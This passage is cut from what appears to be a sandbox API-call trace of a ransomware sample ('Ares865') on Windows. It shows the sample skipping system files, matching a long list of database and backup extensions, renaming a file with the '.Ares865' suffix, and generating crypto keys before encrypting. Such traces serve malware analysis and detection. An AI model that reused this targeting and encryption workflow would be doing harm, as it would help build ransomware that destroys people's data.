Flags=0x8, Size=0x208) returned 0x2d9938 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0072.534] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0072.534] CloseHandle (hObject=0x154) returned 1 [0072.534] CloseHandle (hObject=0x12c) returned 1 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0072.534] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0072.534] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="aoldtz.exe") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2=".") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="..") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="windows") returned -1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="bootmgr") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="temp") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="pagefile.sys") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="boot") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="ids.txt") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="ntuser.dat") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="perflogs") returned 1 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="MSBuild") returned 1 [0072.535] lstrlenW (lpString="VC_redist.x64.exe") returned 17 [0072.535] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0072.535] lstrcpyW (in: lpString1=0x2cce490, lpString2="VC_redist.x64.exe" | out: lpString1="VC_redist.x64.exe") returned="VC_redist.x64.exe" [0072.535] lstrlenW (lpString="VC_redist.x64.exe") returned 17 [0072.535] lstrlenW (lpString="Ares865") returned 7 [0072.535] lstrcmpiW (lpString1="x64.exe", lpString2="Ares865") returned 1 [0072.535] lstrlenW (lpString=".dll") returned 4 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2=".dll") returned 1 [0072.535] lstrlenW (lpString=".lnk") returned 4 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2=".lnk") returned 1 [0072.535] lstrlenW (lpString=".ini") returned 4 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2=".ini") returned 1 [0072.535] lstrlenW (lpString=".sys") returned 4 [0072.535] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2=".sys") returned 1 [0072.535] lstrlenW (lpString="VC_redist.x64.exe") returned 17 [0072.535] lstrlenW (lpString="bak") returned 3 [0072.535] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0072.535] lstrlenW (lpString="ba_") returned 3 [0072.535] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0072.535] lstrlenW (lpString="dbb") returned 3 [0072.535] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0072.535] lstrlenW (lpString="vmdk") returned 4 [0072.535] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0072.535] lstrlenW (lpString="rar") returned 3 [0072.535] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0072.536] lstrlenW (lpString="zip") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0072.536] lstrlenW (lpString="tgz") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0072.536] lstrlenW (lpString="vbox") returned 4 [0072.536] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0072.536] lstrlenW (lpString="vdi") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0072.536] lstrlenW (lpString="vhd") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0072.536] lstrlenW (lpString="vhdx") returned 4 [0072.536] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0072.536] lstrlenW (lpString="avhd") returned 4 [0072.536] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0072.536] lstrlenW (lpString="db") returned 2 [0072.536] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0072.536] lstrlenW (lpString="db2") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0072.536] lstrlenW (lpString="db3") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0072.536] lstrlenW (lpString="dbf") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0072.536] lstrlenW (lpString="mdf") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0072.536] lstrlenW (lpString="mdb") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0072.536] lstrlenW (lpString="sql") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0072.536] lstrlenW (lpString="sqlite") returned 6 [0072.536] lstrcmpiW (lpString1="64.exe", lpString2="sqlite") returned -1 [0072.536] lstrlenW (lpString="sqlite3") returned 7 [0072.536] lstrcmpiW (lpString1="x64.exe", lpString2="sqlite3") returned 1 [0072.536] lstrlenW (lpString="sqlitedb") returned 8 [0072.536] lstrcmpiW (lpString1=".x64.exe", lpString2="sqlitedb") returned -1 [0072.536] lstrlenW (lpString="xml") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0072.536] lstrlenW (lpString="$er") returned 3 [0072.536] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0072.537] lstrlenW (lpString="4dd") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0072.537] lstrlenW (lpString="4dl") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0072.537] lstrlenW (lpString="^^^") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0072.537] lstrlenW (lpString="abs") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0072.537] lstrlenW (lpString="abx") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0072.537] lstrlenW (lpString="accdb") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accdb") returned -1 [0072.537] lstrlenW (lpString="accdc") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accdc") returned -1 [0072.537] lstrlenW (lpString="accde") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accde") returned -1 [0072.537] lstrlenW (lpString="accdr") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accdr") returned -1 [0072.537] lstrlenW (lpString="accdt") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accdt") returned -1 [0072.537] lstrlenW (lpString="accdw") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accdw") returned -1 [0072.537] lstrlenW (lpString="accft") returned 5 [0072.537] lstrcmpiW (lpString1="4.exe", lpString2="accft") returned -1 [0072.537] lstrlenW (lpString="adb") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0072.537] lstrlenW (lpString="adb") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0072.537] lstrlenW (lpString="ade") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0072.537] lstrlenW (lpString="adf") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0072.537] lstrlenW (lpString="adn") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0072.537] lstrlenW (lpString="adp") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0072.537] lstrlenW (lpString="alf") returned 3 [0072.537] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0072.538] lstrlenW (lpString="ask") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0072.538] lstrlenW (lpString="btr") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0072.538] lstrlenW (lpString="cat") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0072.538] lstrlenW (lpString="cdb") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0072.538] lstrlenW (lpString="ckp") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0072.538] lstrlenW (lpString="cma") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0072.538] lstrlenW (lpString="cpd") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0072.538] lstrlenW (lpString="dacpac") returned 6 [0072.538] lstrcmpiW (lpString1="64.exe", lpString2="dacpac") returned -1 [0072.538] lstrlenW (lpString="dad") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0072.538] lstrlenW (lpString="dadiagrams") returned 10 [0072.538] lstrcmpiW (lpString1="st.x64.exe", lpString2="dadiagrams") returned 1 [0072.538] lstrlenW (lpString="daschema") returned 8 [0072.538] lstrcmpiW (lpString1=".x64.exe", lpString2="daschema") returned -1 [0072.538] lstrlenW (lpString="db-journal") returned 10 [0072.538] lstrcmpiW (lpString1="st.x64.exe", lpString2="db-journal") returned 1 [0072.538] lstrlenW (lpString="db-shm") returned 6 [0072.538] lstrcmpiW (lpString1="64.exe", lpString2="db-shm") returned -1 [0072.538] lstrlenW (lpString="db-wal") returned 6 [0072.538] lstrcmpiW (lpString1="64.exe", lpString2="db-wal") returned -1 [0072.538] lstrlenW (lpString="dbc") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0072.538] lstrlenW (lpString="dbs") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0072.538] lstrlenW (lpString="dbt") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0072.538] lstrlenW (lpString="dbv") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0072.538] lstrlenW (lpString="dbx") returned 3 [0072.538] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0072.539] lstrlenW (lpString="dcb") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0072.539] lstrlenW (lpString="dct") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dct") returned 1 [0072.539] lstrlenW (lpString="dcx") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dcx") returned 1 [0072.539] lstrlenW (lpString="ddl") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="ddl") returned 1 [0072.539] lstrlenW (lpString="dlis") returned 4 [0072.539] lstrcmpiW (lpString1=".exe", lpString2="dlis") returned -1 [0072.539] lstrlenW (lpString="dp1") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dp1") returned 1 [0072.539] lstrlenW (lpString="dqy") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dqy") returned 1 [0072.539] lstrlenW (lpString="dsk") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dsk") returned 1 [0072.539] lstrlenW (lpString="dsn") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dsn") returned 1 [0072.539] lstrlenW (lpString="dtsx") returned 4 [0072.539] lstrcmpiW (lpString1=".exe", lpString2="dtsx") returned -1 [0072.539] lstrlenW (lpString="dxl") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="dxl") returned 1 [0072.539] lstrlenW (lpString="eco") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="eco") returned 1 [0072.539] lstrlenW (lpString="ecx") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="ecx") returned 1 [0072.539] lstrlenW (lpString="edb") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="edb") returned 1 [0072.539] lstrlenW (lpString="epim") returned 4 [0072.539] lstrcmpiW (lpString1=".exe", lpString2="epim") returned -1 [0072.539] lstrlenW (lpString="fcd") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="fcd") returned -1 [0072.539] lstrlenW (lpString="fdb") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="fdb") returned -1 [0072.539] lstrlenW (lpString="fic") returned 3 [0072.539] lstrcmpiW (lpString1="exe", lpString2="fic") returned -1 [0072.539] lstrlenW (lpString="flexolibrary") returned 12 [0072.539] lstrcmpiW (lpString1="dist.x64.exe", lpString2="flexolibrary") returned -1 [0072.540] lstrlenW (lpString="fm5") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fm5") returned -1 [0072.540] lstrlenW (lpString="fmp") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fmp") returned -1 [0072.540] lstrlenW (lpString="fmp12") returned 5 [0072.540] lstrcmpiW (lpString1="4.exe", lpString2="fmp12") returned -1 [0072.540] lstrlenW (lpString="fmpsl") returned 5 [0072.540] lstrcmpiW (lpString1="4.exe", lpString2="fmpsl") returned -1 [0072.540] lstrlenW (lpString="fol") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fol") returned -1 [0072.540] lstrlenW (lpString="fp3") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fp3") returned -1 [0072.540] lstrlenW (lpString="fp4") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fp4") returned -1 [0072.540] lstrlenW (lpString="fp5") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fp5") returned -1 [0072.540] lstrlenW (lpString="fp7") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fp7") returned -1 [0072.540] lstrlenW (lpString="fpt") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="fpt") returned -1 [0072.540] lstrlenW (lpString="frm") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="frm") returned -1 [0072.540] lstrlenW (lpString="gdb") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0072.540] lstrlenW (lpString="gdb") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0072.540] lstrlenW (lpString="grdb") returned 4 [0072.540] lstrcmpiW (lpString1=".exe", lpString2="grdb") returned -1 [0072.540] lstrlenW (lpString="gwi") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="gwi") returned -1 [0072.540] lstrlenW (lpString="hdb") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="hdb") returned -1 [0072.540] lstrlenW (lpString="his") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="his") returned -1 [0072.540] lstrlenW (lpString="ib") returned 2 [0072.540] lstrcmpiW (lpString1="xe", lpString2="ib") returned 1 [0072.540] lstrlenW (lpString="idb") returned 3 [0072.540] lstrcmpiW (lpString1="exe", lpString2="idb") returned -1 [0072.541] lstrlenW (lpString="ihx") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="ihx") returned -1 [0072.541] lstrlenW (lpString="itdb") returned 4 [0072.541] lstrcmpiW (lpString1=".exe", lpString2="itdb") returned -1 [0072.541] lstrlenW (lpString="itw") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="itw") returned -1 [0072.541] lstrlenW (lpString="jet") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="jet") returned -1 [0072.541] lstrlenW (lpString="jtx") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="jtx") returned -1 [0072.541] lstrlenW (lpString="kdb") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="kdb") returned -1 [0072.541] lstrlenW (lpString="kexi") returned 4 [0072.541] lstrcmpiW (lpString1=".exe", lpString2="kexi") returned -1 [0072.541] lstrlenW (lpString="kexic") returned 5 [0072.541] lstrcmpiW (lpString1="4.exe", lpString2="kexic") returned -1 [0072.541] lstrlenW (lpString="kexis") returned 5 [0072.541] lstrcmpiW (lpString1="4.exe", lpString2="kexis") returned -1 [0072.541] lstrlenW (lpString="lgc") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="lgc") returned -1 [0072.541] lstrlenW (lpString="lwx") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="lwx") returned -1 [0072.541] lstrlenW (lpString="maf") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="maf") returned -1 [0072.541] lstrlenW (lpString="maq") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="maq") returned -1 [0072.541] lstrlenW (lpString="mar") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="mar") returned -1 [0072.541] lstrlenW (lpString="marshal") returned 7 [0072.541] lstrcmpiW (lpString1="x64.exe", lpString2="marshal") returned 1 [0072.541] lstrlenW (lpString="mas") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="mas") returned -1 [0072.541] lstrlenW (lpString="mav") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="mav") returned -1 [0072.541] lstrlenW (lpString="maw") returned 3 [0072.541] lstrcmpiW (lpString1="exe", lpString2="maw") returned -1 [0072.541] lstrlenW (lpString="mdbhtml") returned 7 [0072.541] lstrcmpiW (lpString1="x64.exe", lpString2="mdbhtml") returned 1 [0072.542] lstrlenW (lpString="mdn") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mdn") returned -1 [0072.542] lstrlenW (lpString="mdt") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mdt") returned -1 [0072.542] lstrlenW (lpString="mfd") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mfd") returned -1 [0072.542] lstrlenW (lpString="mpd") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mpd") returned -1 [0072.542] lstrlenW (lpString="mrg") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mrg") returned -1 [0072.542] lstrlenW (lpString="mud") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mud") returned -1 [0072.542] lstrlenW (lpString="mwb") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="mwb") returned -1 [0072.542] lstrlenW (lpString="myd") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="myd") returned -1 [0072.542] lstrlenW (lpString="ndf") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="ndf") returned -1 [0072.542] lstrlenW (lpString="nnt") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="nnt") returned -1 [0072.542] lstrlenW (lpString="nrmlib") returned 6 [0072.542] lstrcmpiW (lpString1="64.exe", lpString2="nrmlib") returned -1 [0072.542] lstrlenW (lpString="ns2") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="ns2") returned -1 [0072.542] lstrlenW (lpString="ns3") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="ns3") returned -1 [0072.542] lstrlenW (lpString="ns4") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="ns4") returned -1 [0072.542] lstrlenW (lpString="nsf") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="nsf") returned -1 [0072.542] lstrlenW (lpString="nv") returned 2 [0072.542] lstrcmpiW (lpString1="xe", lpString2="nv") returned 1 [0072.542] lstrlenW (lpString="nv2") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="nv2") returned -1 [0072.542] lstrlenW (lpString="nwdb") returned 4 [0072.542] lstrcmpiW (lpString1=".exe", lpString2="nwdb") returned -1 [0072.542] lstrlenW (lpString="nyf") returned 3 [0072.542] lstrcmpiW (lpString1="exe", lpString2="nyf") returned -1 [0072.543] lstrlenW (lpString="odb") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0072.543] lstrlenW (lpString="odb") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0072.543] lstrlenW (lpString="oqy") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="oqy") returned -1 [0072.543] lstrlenW (lpString="ora") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="ora") returned -1 [0072.543] lstrlenW (lpString="orx") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="orx") returned -1 [0072.543] lstrlenW (lpString="owc") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="owc") returned -1 [0072.543] lstrlenW (lpString="p96") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="p96") returned -1 [0072.543] lstrlenW (lpString="p97") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="p97") returned -1 [0072.543] lstrlenW (lpString="pan") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="pan") returned -1 [0072.543] lstrlenW (lpString="pdb") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="pdb") returned -1 [0072.543] lstrlenW (lpString="pdm") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="pdm") returned -1 [0072.543] lstrlenW (lpString="pnz") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="pnz") returned -1 [0072.543] lstrlenW (lpString="qry") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="qry") returned -1 [0072.543] lstrlenW (lpString="qvd") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="qvd") returned -1 [0072.543] lstrlenW (lpString="rbf") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="rbf") returned -1 [0072.543] lstrlenW (lpString="rctd") returned 4 [0072.543] lstrcmpiW (lpString1=".exe", lpString2="rctd") returned -1 [0072.543] lstrlenW (lpString="rod") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="rod") returned -1 [0072.543] lstrlenW (lpString="rodx") returned 4 [0072.543] lstrcmpiW (lpString1=".exe", lpString2="rodx") returned -1 [0072.543] lstrlenW (lpString="rpd") returned 3 [0072.543] lstrcmpiW (lpString1="exe", lpString2="rpd") returned -1 [0072.544] lstrlenW (lpString="rsd") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="rsd") returned -1 [0072.544] lstrlenW (lpString="sas7bdat") returned 8 [0072.544] lstrcmpiW (lpString1=".x64.exe", lpString2="sas7bdat") returned -1 [0072.544] lstrlenW (lpString="sbf") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="sbf") returned -1 [0072.544] lstrlenW (lpString="scx") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="scx") returned -1 [0072.544] lstrlenW (lpString="sdb") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="sdb") returned -1 [0072.544] lstrlenW (lpString="sdc") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="sdc") returned -1 [0072.544] lstrlenW (lpString="sdf") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="sdf") returned -1 [0072.544] lstrlenW (lpString="sis") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="sis") returned -1 [0072.544] lstrlenW (lpString="spq") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="spq") returned -1 [0072.544] lstrlenW (lpString="te") returned 2 [0072.544] lstrcmpiW (lpString1="xe", lpString2="te") returned 1 [0072.544] lstrlenW (lpString="teacher") returned 7 [0072.544] lstrcmpiW (lpString1="x64.exe", lpString2="teacher") returned 1 [0072.544] lstrlenW (lpString="tmd") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="tmd") returned -1 [0072.544] lstrlenW (lpString="tps") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="tps") returned -1 [0072.544] lstrlenW (lpString="trc") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0072.544] lstrlenW (lpString="trc") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0072.544] lstrlenW (lpString="trm") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="trm") returned -1 [0072.544] lstrlenW (lpString="udb") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="udb") returned -1 [0072.544] lstrlenW (lpString="udl") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="udl") returned -1 [0072.544] lstrlenW (lpString="usr") returned 3 [0072.544] lstrcmpiW (lpString1="exe", lpString2="usr") returned -1 [0072.545] lstrlenW (lpString="v12") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="v12") returned -1 [0072.545] lstrlenW (lpString="vis") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="vis") returned -1 [0072.545] lstrlenW (lpString="vpd") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="vpd") returned -1 [0072.545] lstrlenW (lpString="vvv") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="vvv") returned -1 [0072.545] lstrlenW (lpString="wdb") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="wdb") returned -1 [0072.545] lstrlenW (lpString="wmdb") returned 4 [0072.545] lstrcmpiW (lpString1=".exe", lpString2="wmdb") returned -1 [0072.545] lstrlenW (lpString="wrk") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="wrk") returned -1 [0072.545] lstrlenW (lpString="xdb") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="xdb") returned -1 [0072.545] lstrlenW (lpString="xld") returned 3 [0072.545] lstrcmpiW (lpString1="exe", lpString2="xld") returned -1 [0072.545] lstrlenW (lpString="xmlff") returned 5 [0072.545] lstrcmpiW (lpString1="4.exe", lpString2="xmlff") returned -1 [0072.545] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.Ares865") returned 97 [0072.545] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.ares865"), dwFlags=0x1) returned 1 [0072.546] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0072.546] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=781880) returned 1 [0072.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0072.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0072.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0072.547] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0072.547] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0072.548] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.548] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, 